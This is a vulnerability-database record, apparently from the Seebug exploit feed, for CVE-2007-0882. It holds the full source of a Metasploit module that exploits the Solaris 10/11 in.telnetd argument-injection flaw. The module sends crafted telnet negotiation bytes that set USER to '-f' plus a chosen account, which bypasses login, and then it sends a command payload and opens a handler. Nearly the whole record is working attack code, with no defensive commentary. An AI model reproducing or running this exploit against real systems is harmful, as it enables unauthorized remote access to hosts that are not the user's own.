DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-18011", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-12T00:00:00", "title": "Solaris 10\t 11 Telnet Remote Authentication Bypass", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18011", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2007-02-12T00:00:00", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, "The username to use", "bin" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\t\r\n\t\tprint_status('Setting USER environment variable...')\r\n\t\t\r\n\t\treq = "\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB"\r\n\t\treq << "\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF"\r\n\t\treq << "\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05" \r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << "\\xFF\\xFC\\x25"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << "\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << "\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << "\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = "\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF"\r\n\t\treq << "\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52"\r\n\t\treq << "\\x01\\x2D\\x66" + datastore['USER'] + "\\xFF\\xF0"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\t\r\n\t\tsleep(0.25)\r\n\r\n\t\tsock.put(payload.encoded + "\\n")\r\n\t\tsleep(0.25)\t\r\n\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:18011", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:13", "reporter": "Root", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}]}, "exploitation": null, "vulnersScore": 0.7}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850, "epss": 1678851499}}

{}